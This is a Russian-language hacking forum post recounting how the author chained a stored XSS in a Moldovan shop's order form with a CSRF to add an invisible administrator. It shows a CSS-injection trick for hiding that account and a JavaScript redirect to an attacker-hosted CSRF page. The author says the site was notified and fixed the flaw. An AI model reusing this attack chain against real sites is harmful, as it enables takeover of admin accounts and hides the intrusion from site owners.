Показать сообщение отдельно

  #6  
Старый 03.08.2017, 15:14
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

2 XSS и 1 CSRF беспалевный взлом, Исправили но все таки раскажу )

При осуществление заказа поле имя уязвимо к xss которая срабатывает в панели администратора

Код:
http://supergut.md/ru/pages/cart/3/
Сколько я бы не старался украсть куки они не работали незнаю почему (HttpOnly небыл выставлен к кукам и по IP тоже небыло ограничении)

Решил попробовать CSRF атаку потому что структура админ панели мне было известно, а именно POST CSRF на добавление админа так выглядел сплоит

Код:
   
     
       tr:last-child{display:none;}">
Почему в логине

Код:
tr:last-child{display:none;}
потому что так я мог добавлять невидимого юзера через другую инекцию в админке спрятав последнюю строку таблице

Далее я решил использовать и ту же xss из поле имя чтоб средиректить админа на мою CSRF сделал так

Код:
  location="http://host/csrf.html";
Не прошло и 5 минут я был уже в админке



После этого была оповещена администрация которая на 2 день профиксела
 
Ответить с цитированием